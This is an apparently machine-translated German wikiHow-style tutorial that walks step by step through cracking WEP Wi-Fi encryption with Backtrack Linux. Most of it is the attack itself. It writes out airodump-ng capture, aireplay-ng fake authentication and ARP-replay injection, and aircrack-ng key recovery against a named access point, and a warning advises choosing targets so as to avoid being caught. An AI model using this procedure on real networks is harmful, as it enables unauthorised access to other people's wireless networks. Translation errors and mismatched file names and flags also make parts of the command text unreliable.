So brechen Sie die WEP-Verschlüsselung (mit Bildern)

Inhaltsverzeichnis:

So brechen Sie die WEP-Verschlüsselung (mit Bildern)
So brechen Sie die WEP-Verschlüsselung (mit Bildern)

Video: So brechen Sie die WEP-Verschlüsselung (mit Bildern)

Video: So brechen Sie die WEP-Verschlüsselung (mit Bildern)
Video: Google Chrome Webseiten entsperren/freigeben (So geht´s) 2024, Kann
Anonim

Um eine oder mehrere Verschlüsselungscodes zu knacken, müssen Sie einige Dinge wissen. Zuerst müssen Sie wissen, dass es ein Verschlüsselungsschema gibt. Zweitens müssen Sie wissen, wie die Verschlüsselung funktioniert. Jeden Code manuell zu knacken ist nahezu unmöglich; Glücklicherweise können Sie die WEP-Verschlüsselung knacken, wenn Sie ein Paket-Sniffing-Programm verwenden.

Schritte

Brechen Sie die WEP-Verschlüsselung Schritt 1
Brechen Sie die WEP-Verschlüsselung Schritt 1

Schritt 1. Verwenden Sie Linux

Windows kann WEP-Pakete nicht erschnüffeln, aber Sie können eine bootfähige Linux-CD verwenden.

Brechen Sie die WEP-Verschlüsselung Schritt 2
Brechen Sie die WEP-Verschlüsselung Schritt 2

Schritt 2. Holen Sie sich ein Paket-Sniffing-Programm

Backtrack ist eine häufig verwendete Option. Laden Sie das ISO-Image herunter und brennen Sie es auf eine bootfähige CD/DVD.

Brechen Sie die WEP-Verschlüsselung Schritt 3
Brechen Sie die WEP-Verschlüsselung Schritt 3

Schritt 3. Linux booten und zurückverfolgen

Verwenden Sie Ihre bootfähigen CDs/DVDs.

Beachten Sie, dass dieses Betriebssystem nicht auf der Festplatte installiert werden muss. Das bedeutet, dass alle Ihre Daten verloren gehen, wenn Sie den Backtrack herunterfahren

Brechen Sie die WEP-Verschlüsselung Schritt 4
Brechen Sie die WEP-Verschlüsselung Schritt 4

Schritt 4. Wählen Sie eine Startoption

Der folgende Backtrack-Bildschirm wird nach dem Booten angezeigt. Ändern Sie die Option mit den Pfeiltasten nach oben und unten und wählen Sie eine aus. In diesem Tutorial wird die erste Option verwendet.

Brechen Sie die WEP-Verschlüsselung Schritt 5
Brechen Sie die WEP-Verschlüsselung Schritt 5

Schritt 5. Laden Sie die grafische Oberfläche über die Befehlsbasis

Bei dieser Option wird Backtrack auf Befehlsbasis gestartet. Geben Sie Befehl: startx ein, um fortzufahren.

Brechen Sie die WEP-Verschlüsselung Schritt 6
Brechen Sie die WEP-Verschlüsselung Schritt 6

Schritt 6. Klicken Sie unten links auf die Terminal-Schaltfläche

Es wird die fünfte Option sein.

Brechen Sie die WEP-Verschlüsselung Schritt 7
Brechen Sie die WEP-Verschlüsselung Schritt 7

Schritt 7. Warten Sie, bis sich das Linux-Befehlsterminal öffnet

Brechen Sie die WEP-Verschlüsselung Schritt 8
Brechen Sie die WEP-Verschlüsselung Schritt 8

Schritt 8. Zeigen Sie Ihren WLAN-Typ an

Geben Sie folgenden Befehl ein: "airmon-ng" (ohne Anführungszeichen). Sie sollten unter Interface so etwas wie wlan0 sehen.

Brechen Sie die WEP-Verschlüsselung Schritt 9
Brechen Sie die WEP-Verschlüsselung Schritt 9

Schritt 9. Rufen Sie alle erforderlichen Informationen für den Zugangspunkt ab

Geben Sie folgenden Befehl ein: "airodump-ng wlan0" (ohne Anführungszeichen). Sie sollten drei Dinge bekommen:

  • BSSID
  • Kanal
  • ESSID (AP-Name)
  • Hier ist, was der Tutorial-Fall ergab:

    • BSSID 00:17:3F:76:36:6E
    • Kanalnummer 1
    • ESSID(AP-Name)Suleman
Brechen Sie die WEP-Verschlüsselung Schritt 10
Brechen Sie die WEP-Verschlüsselung Schritt 10

Schritt 10. Geben Sie den folgenden Befehl ein

Dieser wird die obigen Beispielinformationen verwenden, aber Sie sollten Ihre eigenen einstecken. Befehl: "airodump-ng -w wep -c 1 -- bssid 00:17:3F:76:36:6E wlan0" (ohne Anführungszeichen).

Brechen Sie die WEP-Verschlüsselung Schritt 11
Brechen Sie die WEP-Verschlüsselung Schritt 11

Schritt 11. Starten Sie das Setup

Brechen Sie die WEP-Verschlüsselung Schritt 12
Brechen Sie die WEP-Verschlüsselung Schritt 12

Schritt 12. Öffnen Sie ein neues Terminalfenster

Geben Sie den folgenden Befehl ein und ersetzen Sie die Werte für Ihre eigene BSSID, Channel und ESSID. Befehl: "aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0" (ohne Anführungszeichen).

Brechen Sie die WEP-Verschlüsselung Schritt 13
Brechen Sie die WEP-Verschlüsselung Schritt 13

Schritt 13. Öffnen Sie ein weiteres neues Terminalfenster

Geben Sie den folgenden Befehl ein: "aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0" (ohne Anführungszeichen).

Brechen Sie die WEP-Verschlüsselung Schritt 14
Brechen Sie die WEP-Verschlüsselung Schritt 14

Schritt 14. Starten Sie das Setup

Brechen Sie die WEP-Verschlüsselung Schritt 15
Brechen Sie die WEP-Verschlüsselung Schritt 15

Schritt 15. Gehen Sie zurück zum ersten Terminalfenster

Brechen Sie die WEP-Verschlüsselung Schritt 16
Brechen Sie die WEP-Verschlüsselung Schritt 16

Schritt 16. Lassen Sie die Daten in diesem Fenster 30000 oder mehr erreichen

Es dauert 15 bis 60 Minuten (oder länger) je nach Wireless-Signal, Hardware und Auslastung des Access Points.

Brechen Sie die WEP-Verschlüsselung Schritt 17
Brechen Sie die WEP-Verschlüsselung Schritt 17

Schritt 17. Gehen Sie zum dritten Terminalfenster und drücken Sie Strg + c

Brechen Sie die WEP-Verschlüsselung Schritt 18
Brechen Sie die WEP-Verschlüsselung Schritt 18

Schritt 18. Rufen Sie die Verzeichnisse auf

Geben Sie den folgenden Befehl ein: "dir" (ohne Anführungszeichen). Dadurch werden die Verzeichnisse angezeigt, die während der Entschlüsselung darauf gespeichert sind.

Brechen Sie die WEP-Verschlüsselung Schritt 19
Brechen Sie die WEP-Verschlüsselung Schritt 19

Schritt 19. Verwenden Sie eine Cap-Datei

Für das Beispiel wäre es wie folgt: "aircrack-ng web-02.cap" (ohne Anführungszeichen). Das unten gezeigte Setup wird gestartet.

Brechen Sie die WEP-Verschlüsselung Schritt 20
Brechen Sie die WEP-Verschlüsselung Schritt 20

Schritt 20. Brechen Sie den WEP-verschlüsselten Schlüssel

Nachdem diese Einrichtung abgeschlossen ist, können Sie den Schlüssel knacken. In diesem Beispiel war es {ADA2D18D2E}.

Tipps

  • Gesetze zur Netzwerksicherheit können von Ort zu Ort unterschiedlich sein. Stellen Sie sicher, dass Sie alles wissen, was Sie wissen müssen, und seien Sie bereit, sich den Konsequenzen Ihrer Handlungen zu stellen, während Sie dies versuchen.
  • Wenn Sie eine Fehlermeldung erhalten, dass Ihre aktuelle Netzwerkkarte belegt ist, versuchen Sie den Befehl "airmon-ng wlan0" (ohne Anführungszeichen) und wiederholen Sie dann die Befehle in dieser Anleitung jedes Mal mit mon0 anstelle von wlan0.
  • Sie werden wahrscheinlich in der Lage sein, bereits kompilierte Versionen der meisten Programme zu finden, die Sie benötigen.
  • Viele Sniffing-Programme wie Wireshark (früher bekannt als Ethereal) sowie Airsnort und Kismet sind als Quellcode verfügbar. Um Airsnort oder Kismet verwenden zu können, benötigen Sie einige Kenntnisse im Kompilieren von Quellcode für Linux oder Windows. Wireshark/Ethereal wird mit einem Installationsprogramm geliefert oder Sie können den Quellcode herunterladen.
  • Backtrack Linux wird jetzt umbenannt und als Kali Linux vertrieben. Es kann von der Kali Linux Homepage heruntergeladen werden

Warnungen

  • Sie benötigen eine bestimmte WLAN-Karte, die mit den von Ihnen verwendeten Programmen kompatibel ist
  • Achten Sie immer darauf, wer Ihr Ziel ist. Es ist nicht schlau, in Ihren lokalen McDonalds zu gehen und zu versuchen, ihr Netz zu knacken. Die Wahrscheinlichkeit, erwischt zu werden, steigt um das Zehnfache.
  • Diese Informationen sind ethisch zu verwenden. Der Missbrauch dieser Informationen kann sowohl lokal als auch auf Bundesebene illegal sein.

Empfohlen: